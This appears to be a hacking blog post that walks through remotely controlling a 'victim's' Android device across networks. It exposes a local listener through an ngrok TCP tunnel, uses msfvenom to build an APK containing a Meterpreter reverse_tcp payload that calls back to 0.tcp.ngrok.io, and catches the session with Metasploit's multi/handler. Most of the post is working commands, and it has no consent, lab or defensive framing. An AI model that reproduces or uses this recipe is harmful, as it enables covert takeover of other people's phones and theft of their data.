Ticker

6/recent/ticker-posts

Remotely Control Out Of LAN (Local Area Network) Devices With Metasploit And Ngrok

Hi ! Guys we are come back with another excited practical of exploitation with metasploit-framework in which we show you how to remotely access victim's devices out of local area network or victim on different network or wifi with payload. So excited let's get started.


Requirements:-

Setup Ngrok For Port Forwarding:-


  1. Download and setup ngrok in your terminal
$ ./ngrok authtoken ****Paste Your Auth Token****

$ ./ngrok tcp 4444 (You can use different port in place of 4444 and tcp)

Once it show you online status interface then it's done. Now open new session and proceed.

Generating Payload:-

$ msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=15048(Use Your given Port in my case 15048) R > Payload.apk

Now wait unitl it generate payload for you. Once it done now you can install payload in victim device and exploit with given commands.

Exploitation:-


$ msfconsole

$ use mulit/handler

$ set payload android/meterpreter/reverse_tcp

$ set lhost 0.0.0.0

$ set lport 4444 (Type your port in my case am used 4444)

$ exploit

Now it works out of LAN successfully.

Note:- Once you closed the ngrok server it completely cleaned and did not connect again with victim 

I hop this information is helpful for you if you found something interesting then follow us on other social media platforms for stay connected and stay updated. If you have any question or face any problem then feel free to comment below. Thanks for visit have a nice day.

Mohit Saran (Hacker's King)